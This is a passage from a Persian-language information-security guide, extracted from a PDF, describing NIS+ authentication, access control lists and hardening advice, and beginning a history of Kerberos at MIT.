‫ﻫﻮﻳﺖ ﺁﻧﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﻭ "ﺩﺍﻳﺮﻛﺘﻮﺭﻱﻫﺎ" ﻇﺮﻓﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺟﺪﻭﻟﻬﺎ‪ ،‬ﮔﺮﻭﻫﻬﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺩﺍﻳﺮﻛﺘﻮﺭﻱﻫﺎﻱ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ ﻳـﻚ ﺳـﺎﺧﺘﺎﺭ ﺩﺭﺧﺘـﻲ‬
‫ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS+‬ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪NIS+‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NIS+‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺭﺿﺎﻳﺘﺒﺨﺶ ﺑﺎﺷﺪ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺼﻮﺭﺕ‬
‫ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻮﺍﺭﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ‪ NIS+‬ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ‪ ،‬ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺁﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ‪ NIS+‬ﻳﻜﺴﺎﻥ ﺑﺎﺷﻨﺪ )ﻛﻪ ﻣﻌﻤﻮ ﹰﻻ ﭼﻨﻴﻦ ﺍﺳﺖ( ﺭﻭﻧﺪ ‪ keyserv‬ﻣﺮﺑﻮﻁ ﺑـﻪ ‪ NIS+‬ﻛﻠﻴـﺪ‬
‫ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﮕﻪ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮ ﺑﻪ ﻫﻤﺔ ﺧﺪﻣﺎﺕ ‪ Secure RPC‬ﺩﺳﺘﺮﺳﻲ ﺷﺒﻪ ﻣﺴﺘﻘﻴﻢ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ‬
‫)ﺑﻌﺒﺎﺭﺕ ﺩﻳﮕﺮ ﻻﻳﺔ ﻣﻴﺎﻧﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺎﻣﺮﺋﻲ ﻣﻲﺷﻮﺩ(‪ .‬ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ‪ NIS+‬ﻳﻜـﺴﺎﻥ ﻧﺒﺎﺷـﻨﺪ‪ ،‬ﺁﻧﮕـﺎﻩ ﻛـﺎﺭﺑﺮ‬
‫‪Incremental Update‬‬
‫‪NIS+ Root Server‬‬
‫‪NIS+ Root Domain‬‬
‫‪NIS+ Principals‬‬
‫‪Objects‬‬
‫‪165‬‬
‫‪166‬‬
‫‪167‬‬
‫‪168‬‬
‫‪169‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪ ۱۶ ،NIS+‬ﺟﺪﻭﻝ ﺭﺍ ﺍﺯ ﭘﻴﺶ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ‪ ،‬ﺷﺎﻣﻞ ﺟﺪﻭﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﭘﺮﻭﺗﻜﻠﻬـﺎ ﻭ ﺧـﺪﻣﺎﺕ‪ ،‬ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﮔﺮﻭﻩﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﭘﺴﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻨﺪﮔﺎﻧﻪ ﻭ ﺳﺎﻳﺮ ﻣـﻮﺍﺭﺩ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺳﺘـﺸﺎﻥ ﺑـﺮﺍﻱ ﺳـﺎﺧﺘﻦ‬
‫ﺟﺪﻭﻟﻬﺎﻱ ﺍﺿﺎﻓﻪ ﺑﺮﺍﻱ ﺧﻮﺩﺷﺎﻥ ﺑﺎﺯ ﺍﺳﺖ‪.‬‬
‫‪٣٣٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ keylogin‬ﻭﺍﺭﺩ ﺩﺍﻣﻨـﻪ ‪ NIS+‬ﺷـﻮﺩ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ‪ NIS+‬ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓﺮﻣـﺎﻥ‬
‫‪ nispasswd‬ﻋﻮﺽ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﺎﺑﻪ ﻓﺮﻣﺎﻥ ‪ Unix passwd‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻞ‬
‫ﻝ ﺩﺳﺘﺮﺳـﻲ ﻛـﻪ ﺭﺍﻫﻬـﺎﻱ ﺗﻌﺎﻣـ ﹺ‬
‫ﺍﻣﻨﻴﺖ ‪ NIS+‬ﺑﺎ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻥ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻭ ﺑﺎ ﺍﻳﺠﺎﺩ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘـﺮ ﹺ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺟﺪﺍﻭﻝ ‪ NIS+‬ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﻮﺩ‪ NIS+ .‬ﺩﻭ ﻧﻮﻉ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ :‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺤﻠﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻓﺮﻣﺎﻥ ‪ NIS+‬ﺗﻮﺳﻂ ‪ UID‬ﺍﺳﺖ ﻭ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺻﻠﻲ ‪ NIS+‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ DES‬ﻧﻴﺰ ﺑﺮ ﻣﺒﻨﺎﻱ ‪ Secure RPC‬ﺍﺳﺖ‪.‬‬
‫ﻻ ﻫﻤﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺁﻥ ﻣﻲﺑﺎﺷﺪ )ﻣﺎﻟﻚ ﻳﻚ ﺷﻲﺀ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑـﺎ ﻓﺮﻣـﺎﻥ ‪ nischown‬ﺗﻐﻴﻴـﺮ ﺩﺍﺩ(‪.‬‬
‫ﻫﺮ ﺷﻲﺀ ‪ NIS+‬ﻳﻚ "ﻣﺎﻟﻚ" ﺩﺍﺭﺩ‪ ،‬ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺷﻴﺎﻱ ‪ NIS+‬ﻫﻤﭽﻨﻴﻦ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﻣﻮﻛﻞ ﺩﺍﺭﺍﻱ ﭼﻪ ﻧـﻮﻋﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺑﻪ ﺷﻲﺀ ﺍﺳﺖ ‪ -‬ﺧﻮﺍﻧﺪﻥ‪ ،‬ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻳﺠﺎﺩ‪ ،‬ﺣﺬﻑ‪ ،‬ﻳﺎ ﺍﺩﻏﺎﻡ ‪ -‬ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﻮﻛﻞ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺷﻲﺀ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪:‬‬
‫ﻫﻴﭽﻜﺲ )ﺗﻘﺎﺿﺎﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺸﺪﻩ(‪ ،‬ﻣﺎﻟﻚ ﺷﻲﺀ‪ ،‬ﻣﻮﻛﻼﻧﻲ ﻛﻪ ﺑﺎ ﺷﻲﺀ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﻣﻮﻛﻼﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﺩﻳﮕﺮ‪.‬‬
‫ﺟﺪﺍﻭﻝ ‪ NIS+‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺭﺩﻳﻔﻬﺎ‪ ،‬ﺳﺘﻮﻧﻬﺎ‪ ،‬ﻳﺎ ﺍﻗﻼﻡ ﺩﺍﺩﻩﺍﻱ ﻣﻨﻔﺮﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺑﺪﻫﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻫﻤـﺔ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﻪ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﺟﺪﻭﻝ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﻫﺮ ﻛﺎﺭﺑﺮ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧـﺪ ﺁﻥ ﺳـﻄﺮ ﺍﺯ ﺟـﺪﻭﻝ ﺭﺍ‬
‫ﻛﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺍﻭ ﻣﺮﺑﻮﻁ ﺍﺳﺖ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﺯ ﺁﻧﺠﺎ ﻛـﻪ ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﺭﺩﻳﻔﻬـﺎ‪ ،‬ﺳـﺘﻮﻧﻬﺎ‪ ،‬ﻭ ﺍﻗـﻼﻡ ﺩﺍﺩﻩﺍﻱ‬
‫ﻣﻨﻔﺮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺑﺰﺭﮔﺘﺮ ﻛﻨﻨﺪ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻣﺤﺪﻭﺩﻛﻨﻨﺪﺓ ﺑﻴﺸﺘﺮ‪ ،‬ﻗﺎﺑﻞ ﺍﻋﻤﺎﻝ ﻧﻤﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ‪NIS+‬‬
‫ﺍﮔﺮ ‪ NIS+‬ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﺷﺒﻜﻪ ﺳﻴﺴﺘﻢ ﺑﺴﻴﺎﺭ ﺍﻣﻨﻲ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ‪ ،‬ﻣﺜـﻞ ﻫﻤـﺔ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻳﺎ ﻣﺪﻳﺮﻳﺖ ‪ NIS+‬ﺍﺷﺘﺒﺎﻫﻲ ﺭﺥ ﺩﻫﺪ ﻛﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﺑﺮ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ‪NIS+‬‬
‫ﻼ ﻣﺴﺎﺋﻠﻲ ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺫﻛﺮ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺍﺯ ﺁﻥ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻦ ﺍﻳﻤﻨﻲ ﺑﺎﺷﺪ‪ .‬ﺫﻳ ﹰ‬
‫‪ NIS+‬ﺭﺍ ﺩﺭ ﺣﺎﻟﺖ ﺳﺎﺯﮔﺎﺭﻱ ‪ ١٧٠NIS‬ﺍﺟﺮﺍ ﻧﻜﻨﻴﺪ‬
‫‪ NIS+‬ﺩﺍﺭﺍﻱ ﻳﻚ ﺣﺎﻟﺖ "ﺳﺎﺯﮔﺎﺭﻱ ‪ "NIS‬ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS+‬ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﮔﺎﻥ ‪ NIS‬ﺍﺯ‬
‫ﺩﺭﻭﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ‪ NIS+‬ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺣﺎﻟﺖ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻫﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺩﺭ ﺷﺒﻜﺔ ﺷﻤﺎ )ﻭ ﺷﺎﻳﺪ ﺣﺘﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺩﻳﮕﺮ( ﻗﺎﺩﺭ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﻪ ﻫﺮ ﻗﻄﻌﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS+‬ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬
‫ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﺷﻴﺎﻱ‪ NIS+‬ﺭﺍ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬
‫ﻫﻨﻮﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺮﺭﺳﻲ ﺟﺎﻣﻌﻴﺖ ‪ NIS+‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺟﺪﻭﻟﻬﺎﻱ ‪ ،NIS+‬ﺩﺍﻳﺮﻛﺘـﻮﺭﻱﻫـﺎ‪ ،‬ﻭ ﮔﺮﻭﻫﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﺳـﺘﻲ ﻭ ﺩﺭ‬
‫ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻫﻴﭻ ﻳﺎ ﻫﻤﻪ ﻛﺲ ﺍﺟﺎﺯﻩ ﺗﻐﻴﻴﺮ ﺩﺍﺭﻧـﺪ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺟـﺪﺍﻭﻟﻲ ﻛـﻪ ﺍﻳـﻦ ﺩﻭ‬
‫ﻃﺒﻘﻪ ﺍﺯ ﻣﻮﻛﻼﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺷﻴﺎﻱ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺭﻭﻱ ﺁﻧﻬﺎ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺍﻳﻤﻦ ﻛﻨﻴﺪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS+‬ﺣﺪﺍﻛﺜﺮ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻤﻴﻦ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪NIS+‬‬
‫ﺩﺳﺘﺮﺳﻲ "‪ "root‬ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﻫﺮ ﺗﻐﻴﻴﺮ ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﺩﺭ ﺩﺍﻣﻨﺔ ‪ NIS+‬ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺷﺎﻣﻞ ﺍﻳﺠﺎﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ‪ ،‬ﺗﻐﻴﻴﺮ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻭ ﺣﺘﻲ ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS+‬ﻫﻢ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪170 NIS Compatibility Mode‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٣٧‬‬
‫ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺷﻤﺎﺭﺓ ‪ NIS+ ۲‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺳﻪ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻧﺎﻣﻬﺎﻱ ‪ ،۱ ،۰‬ﻭ ‪ ۲‬ﻛﺎﺭ ﻛﻨﻨﺪ‪ .‬ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﻭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛﺎﻣـﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺗﻨﻬﺎ ﺩﺭ ﺳﻄﺢ ‪ ۲‬ﻓﻌﺎﻝ ﺍﺳﺖ‪ ،‬ﻭ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻄﺢ ‪ ۲‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫‪Kerberos‬‬
‫ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ‪۱۹۸۰‬ﺩﺭ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳﺖ )‪ ١٧١(MIT‬ﺻﺪﻫﺎ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﻮﻱ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﻤﺎﻳﺸﮕﺮﻫﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ‬
‫‪١٧٢‬‬
‫ﺳﺮﻳﻊ )ﺩﺭ ﺁﻧﺰﻣﺎﻥ(‪ ،‬ﺩﻳﺴﻜﻬﺎﻱ ﻛﻮﭼﻚ‪ ،‬ﻭ ﺭﺍﺑﻂﻫﺎﻱ ‪ ،Ethernet‬ﺟﺎﻳﮕﺰﻳﻦ ﺳﻴﺴﺘﻢ ﻗﺪﻳﻤﻲﺗﺮ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎ ﻭ ﭼﻨﺪ ﺭﺍﻳﺎﻧﺔ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ‬
‫ﺗﺸﻜﻴﻞ ﻳﺎﻓﺘﻪﺑﻮﺩ ﺷﺪ‪ .‬ﻫﺪﻑ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﻭ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺍﻳﺴﺘﮕﺎﻩﻫﺎﻱ ﻛﺎﺭﻱ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﻣﺸﻜﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺷﺒﻜﻪ ﺑﻪ ﻃـﻮﺭ ﺁﺯﺍﺭﺩﻫﻨـﺪﻩﺍﻱ ﺁﺷـﻜﺎﺭ ﺷـﺪ‪ .‬ﭼـﻮﻥ ﺍﺯ‬
‫ﻫﻤﻪﺟﺎ ﻣﻲﺷﺪ ﺑﻪ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺖ‪ ،‬ﻫﻴﭻ ﭼﻴﺰﻱ ﻣﺎﻧﻊ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ )ﻳﺎ ﻣﻬﺎﺟﻤﻴﻦ ﺧﺎﺭﺝ ﻣﺆﺳﺴﻪ( ﻧﻤﻲﺷﺪ ﻛﻪ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺟﺎﺳﻮﺳـﻲ‬
‫ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺑﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﺍﻓﺸﺎ ﺷﺪﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺗﻮﺳﻂ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻳﺎ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬
‫ﻣﺠﺪﺩ ﺁﻧﻬﺎ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪ .‬ﭼﻴﺰﻱ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻲﻛﺮﺩ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑـﻪ‬
‫ﺷﺒﻜﻪ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪ IBM PC/AT‬ﺑﻮﺩﻧﺪ ﻭ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻣﻘﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻢ ﺑﻲﺑﻬﺮﻩ ﺑـﻮﺩ‪ .‬ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ‬
